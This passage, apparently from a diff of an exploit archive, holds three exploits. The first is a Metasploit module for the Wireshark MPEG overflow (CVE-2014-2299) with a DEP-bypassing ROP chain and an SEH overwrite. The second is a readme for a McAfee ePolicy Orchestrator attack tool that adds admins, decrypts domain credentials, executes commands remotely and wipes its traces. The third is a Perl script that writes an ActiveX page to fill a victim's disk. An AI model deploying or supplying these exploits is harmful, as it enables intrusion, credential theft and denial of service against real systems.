[ 'CVE', '2014-2299'],
[ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9843' ],
[ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2014-04.html' ],
[ 'URL', 'http://www.securityfocus.com/bid/66066/info' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'BadChars' => "\xff",
'Space' => 600,
'DisableNops' => 'True',
'PrependEncoder' => "\x81\xec\xc8\x00\x00\x00" # sub esp,200
},
'Platform' => 'win',
'Targets' =>
[
[ 'WinXP SP3 Spanish (bypass DEP)',
{
'OffSet' => 69732,
'OffSet2' => 70476,
'Ret' => 0x1c077cc3, # pop/pop/ret -> "c:\Program Files\Wireshark\krb5_32.dll" (version: 1.6.3.16)
'jmpesp' => 0x68e2bfb9,
}
],
[ 'WinXP SP2/SP3 English (bypass DEP)',
{
'OffSet2' => 70692,
'OffSet' => 70476,
'Ret' => 0x1c077cc3, # pop/pop/ret -> krb5_32.dll module
'jmpesp' => 0x68e2bfb9,
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Mar 20 2014'
))
register_options(
[
OptString.new('FILENAME', [ true, 'pcap file', 'mpeg_overflow.pcap']),
], self.class)
end
def create_rop_chain()
# rop chain generated with mona.py - www.corelan.be
rop_gadgets =
[
0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
0x62d9027c, # ptr to &VirtualProtect() [IAT libcares-2.dll]
0x61970969, # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
0x61988cf6, # XCHG EAX,ESI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
0x619c0a2a, # POP EBP # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
0x61841e98, # & push esp # ret [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
0x6191d11a, # POP EBX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
0x00000201, # 0x00000201-> ebx
0x5a4c1414, # POP EDX # RETN [zlib1.dll, ver: 1.2.5.0]
0x00000040, # 0x00000040-> edx
0x6197660f, # POP ECX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
0x668242b9, # &Writable location [libgnutls-26.dll]
0x6199b8a5, # POP EDI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0
0x63a528c2, # RETN (ROP NOP) [libgobject-2.0-0.dll]
0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
0x90909090, # nop
0x6199652d, # PUSHAD # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
].flatten.pack("V*")
return rop_gadgets
end
def exploit
print_status("Creating '#{datastore['FILENAME']}' file ...")
ropchain = create_rop_chain
magic_header = "\xff\xfb\x41" # mpeg magic_number(MP3) -> http://en.wikipedia.org/wiki/MP3#File_structure
# Here we build the packet data
packet = rand_text_alpha(883)
packet << "\x6c\x7d\x37\x6c" # NOP RETN
packet << "\x6c\x7d\x37\x6c" # NOP RETN
packet << ropchain
packet << payload.encoded # Shellcode
packet << rand_text_alpha(target['OffSet'] - 892 - ropchain.length - payload.encoded.length)
# 0xff is a badchar for this exploit then we can't make a jump back with jmp $-2000
# After nseh and seh we haven't space, then we have to jump to another location.
# When file is open with command line. This is NSEH/SEH overwrite
packet << make_nops(4) # nseh
packet << "\x6c\x2e\xe0\x68" # ADD ESP,93C # MOV EAX,EBX # POP EBX # POP ESI # POP EDI # POP EBP # RETN
packet << rand_text_alpha(target['OffSet2'] - target['OffSet'] - 8) # junk
# When file is open with GUI interface. This is NSEH/SEH overwrite
packet << make_nops(4) # nseh
# seh -> # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] **
packet << "\x55\x59\x80\x6b"
print_status("Preparing payload")
filecontent = magic_header
filecontent << packet
print_status("Writing payload to file, " + filecontent.length.to_s()+" bytes")
file_create(filecontent)
end
end

53
platforms/windows/remote/33071.txt Executable file
View file

@ -0,0 +1,53 @@
# Exploit Title: McAfee ePolicy Orchestrator 4.6.0-4.6.5 (ePowner) - Multiple vulnerabilities
# Date: 20 November 2012
# Exploit Author: st3n@funoverip.net (a.k.a. jerome.nokin@gmail.com)
# Vendor Homepage: http://www.mcafee.com/uk/products/epolicy-orchestrator.aspx
# Version: 4.6.0 -> 4.6.5
# Tested on: Windows 2003/2008
# CVE : CVE-2013-0140 , CVE-2013-0141
# More info on: http://funoverip.net/?p=1685
PoC: http://www.exploit-db.com/sploits/ePowner.0.1.tar.gz
=====================================================================================================
INTRODUCTION
=====================================================================================================
- In short, this tool registers a rogue agent on the ePo server and then takes advantage of the
following vulnerabilities to perform multiple actions :
- CVE-2013-0140 : Pre-auth SQL Injection
- CVE-2013-0141 : Pre-auth Directory Path Traversal
- The tool manages the following actions, called "mode" :
-r, --register Register a new agent on the ePo server (it's free)
--check Check the SQL Injection vunerability
--add-admin Add a new web admin account into the DB
--readdb Retrieve various information from the database
--get-install-path Retrieve the installation path of ePo software (needed for other modes)
--ad-creds Retrieve and decrypt cached domain credentials from ePo database.
--wipe Wipe our traces from the database and file system
--srv-exec Perform remote command execution on the ePo server
--srv-upload Upload files on the ePo server
--cli-deploy Deploy commands or softwares on clients
- It is strongly advised to read the manual which explains how to use these modes (see below).
But basically, your two first actions must be :
1) Register a rogue agent using '--register'
2) Setup Remote Code execution using '--srv-exec --wizard'
- Usage examples are provided at the end of this file. It is recommended to read the doc before
any of usage of them.
- You may find a vulnerable version of the ePo software on my blog. Deploy 2 VMs (eposrv + epocli) and
test it !
- The tool was developed/tested on Backtrack 5r3, Kali Linux 1.0.6 and Ubuntu 12.04.
It won't work under Windows due to linux tools dependencies.
. ePolicy Orchestrator was running on Win2003 and Win2003 R2
. The managed station were running on WinXPsp3 and Win7

37
platforms/windows/remote/33089.pl Executable file
View file

@ -0,0 +1,37 @@
source: http://www.securityfocus.com/bid/35725/info
The iDefense COMRaider ActiveX control is prone to multiple insecure-method vulnerabilities.
Successfully exploiting these issues allows remote attackers to create arbitrary directories and copy arbitrary local files. This may lead to a denial-of-service condition or aid in further attacks.
#!/usr/bin/perl
###############################################################
# COMRaider Idefense Labs CreateFolder() and Copy() Insecure Method (Hard Disk Filler Exploit)
#
# Discovered and Exploited by : Khashayar Fereidani
# Http://IRCRASH.com & Http://Fereidani.ir
#
##############################################################
# Help :
# perl comraider.pl
# Please enter the foldername (C:\ircrash\ for example) : C:\ircrash\
# Please enter number of copy cmd to folder (10000 or more for example) : 10000
# ** Ok comraider.html created , now you can use this
###############################################################
# Tnx : Only for God
###############################################################
$cmd = 'C:\WINDOWS\system32\cmd.exe';
print 'Please enter the foldername (C:\ircrash\ for example) : ';
$folder = <stdin>;
print "Please enter number of copy cmd to folder (10000 or more for example) : ";
$number = <stdin>;
chomp $number;
chomp $folder;
$shellcode = chr(0x3C).chr(0x48).chr(0x54).chr(0x4D).chr(0x4C).chr(0x3E).chr(0xD).chr(0xA).chr(0x3C).chr(0x21).chr(0x2D).chr(0x2D).chr(0xD).chr(0xA).chr(0x43).chr(0x4F).chr(0x4D).chr(0x52).chr(0x61).chr(0x69).chr(0x64).chr(0x65).chr(0x72).chr(0x20).chr(0x49).chr(0x64).chr(0x65).chr(0x66).chr(0x65).chr(0x6E).chr(0x73).chr(0x65).chr(0x20).chr(0x4C).chr(0x61).chr(0x62).chr(0x73).chr(0x20).chr(0x43).chr(0x72).chr(0x65).chr(0x61).chr(0x74).chr(0x65).chr(0x46).chr(0x6F).chr(0x6C).chr(0x64).chr(0x65).chr(0x72).chr(0x28).chr(0x29).chr(0x20).chr(0x61).chr(0x6E).chr(0x64).chr(0x20).chr(0x43).chr(0x6F).chr(0x70).chr(0x79).chr(0x28).chr(0x29).chr(0x20).chr(0x49).chr(0x6E).chr(0x73).chr(0x65).chr(0x63).chr(0x75).chr(0x72).chr(0x65).chr(0x20).chr(0x4D).chr(0x65).chr(0x74).chr(0x68).chr(0x6F).chr(0x64).chr(0x20).chr(0x45).chr(0x78).chr(0x70).chr(0x6C).chr(0x6F).chr(0x69).chr(0x74).chr(0xD).chr(0xA).chr(0x44).chr(0x69).chr(0x73).chr(0x63).chr(0x6F).chr(0x76).chr(0x65).chr(0x72).chr(0x65).chr(0x64).chr(0x20).chr(0x62).chr(0x79).chr(0x20).chr(0x3A).chr(0x20).chr(0x4B).chr(0x68).chr(0x61).chr(0x73).chr(0x68).chr(0x61).chr(0x79).chr(0x61).chr(0x72).chr(0x20).chr(0x46).chr(0x65).chr(0x72).chr(0x65).chr(0x69).chr(0x64).chr(0x61).chr(0x6E).chr(0x69).chr(0xD).chr(0xA).chr(0x68).chr(0x74).chr(0x74).chr(0x70).chr(0x3A).chr(0x2F).chr(0x2F).chr(0x66).chr(0x65).chr(0x72).chr(0x65).chr(0x69).chr(0x64).chr(0x61).chr(0x6E).chr(0x69).chr(0x2E).chr(0x69).chr(0x72).chr(0x20).chr(0x26).chr(0x20).chr(0x68).chr(0x74).chr(0x74).chr(0x70).chr(0x3A).chr(0x2F).chr(0x2F).chr(0x69).chr(0x72).chr(0x63).chr(0x72).chr(0x61).chr(0x73).chr(0x68).chr(0x2E).chr(0x63).chr(0x6F).chr(0x6D).chr(0xD).chr(0xA).chr(0x2D).chr(0x2D).chr(0x3E).chr(0xD).chr(0xA).chr(0xD).chr(0xA).chr(0x3C).chr(0x6F).chr(0x62).chr(0x6A).chr(0x65).chr(0x63).chr(0x74).chr(0x20).chr(0x63).chr(0x6C).chr(0x61).chr(0x73).chr(0x73).chr(0x69).chr(0x64).chr(0x3D).chr(0x27).chr(0x63).chr(0x6C).chr(0x73).chr(0x69).chr(0x64).chr(0x3A).chr(0x39).chr(0x41).chr(0x30).chr(0x37).chr(0x37).chr(0x44).chr(0x30).chr(0x44).chr(0x2D).chr(0x42).chr(0x34).chr(0x41).chr(0x36).chr(0x2D).chr(0x34).chr(0x45).chr(0x43).chr(0x30).chr(0x2D).chr(0x42).chr(0x36).chr(0x43).chr(0x46).chr(0x2D).chr(0x39).chr(0x38).chr(0x35).chr(0x32).chr(0x36).chr(0x44).chr(0x46).chr(0x35).chr(0x38).chr(0x39).chr(0x45).chr(0x34).chr(0x27).chr(0x20).chr(0x69).chr(0x64).chr(0x3D).chr(0x27).chr(0x74).chr(0x61).chr(0x72).chr(0x67).chr(0x65).chr(0x74).chr(0x27).chr(0x3E).chr(0x3C).chr(0x2F).chr(0x6F).chr(0x62).chr(0x6A).chr(0x65).chr(0x63).chr(0x74).chr(0x3E).chr(0xD).chr(0xA).chr(0xD).chr(0xA).chr(0x3C).chr(0x73).chr(0x63).chr(0x72).chr(0x69).chr(0x70).chr(0x74).chr(0x20).chr(0x6C).chr(0x61).chr(0x6E).chr(0x67).chr(0x75).chr(0x61).chr(0x67).chr(0x65).chr(0x3D).chr(0x27).chr(0x76).chr(0x62).chr(0x73).chr(0x63).chr(0x72).chr(0x69).chr(0x70).chr(0x74).chr(0x27).chr(0x3E).chr(0xD).chr(0xA).chr(0x61).chr(0x72).chr(0x67).chr(0x66).chr(0x3D).chr(0x22).$folder.chr(0x22).chr(0xD).chr(0xA).chr(0x74).chr(0x61).chr(0x72).chr(0x67).chr(0x65).chr(0x74).chr(0x2E).chr(0x43).chr(0x72).chr(0x65).chr(0x61).chr(0x74).chr(0x65).chr(0x46).chr(0x6F).chr(0x6C).chr(0x64).chr(0x65).chr(0x72).chr(0x20).chr(0x61).chr(0x72).chr(0x67).chr(0x66).chr(0xD).chr(0xA).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20).chr(0x3D).chr(0x20).chr(0x30).chr(0xD).chr(0xA).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x32).chr(0x20).chr(0x3D).chr(0x20).$number.chr(0xD).chr(0xA).chr(0x77).chr(0x68).chr(0x69).chr(0x6C).chr(0x65).chr(0x20).chr(0x28).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20).chr(0x3C).chr(0x20).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x32).chr(0x29).chr(0xD).chr(0xA).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20).chr(0x3D).chr(0x20).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20).chr(0x2B).chr(0x20).chr(0x31).chr(0xD).chr(0xA).chr(0x61).chr(0x72).chr(0x67).chr(0x31).chr(0x3D).chr(0x22).$cmd.chr(0x22).chr(0xD).chr(0xA).chr(0x61).chr(0x72).chr(0x67).chr(0x32).chr(0x3D).chr(0x61).chr(0x72).chr(0x67).chr(0x66).chr(0x20).chr(0x26).chr(0x20).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20).chr(0x26).chr(0x20).chr(0x22).chr(0x2E).chr(0x65).chr(0x78).chr(0x65).chr(0x22).chr(0xD).chr(0xA).chr(0x74).chr(0x61).chr(0x72).chr(0x67).chr(0x65).chr(0x74).chr(0x2E).chr(0x43).chr(0x6F).chr(0x70).chr(0x79).chr(0x20).chr(0x61).chr(0x72).chr(0x67).chr(0x31).chr(0x20).chr(0x2C).chr(0x61).chr(0x72).chr(0x67).chr(0x32).chr(0xD).chr(0xA).chr(0x77).chr(0x65).chr(0x6E).chr(0x64).chr(0xD).chr(0xA).chr(0x3C).chr(0x2F).chr(0x73).chr(0x63).chr(0x72).chr(0x69).chr(0x70).chr(0x74).chr(0x3E);
print "** OK comraider.html created , now you can use this";
open(myfile,'>>comraider.html');
print myfile $shellcode;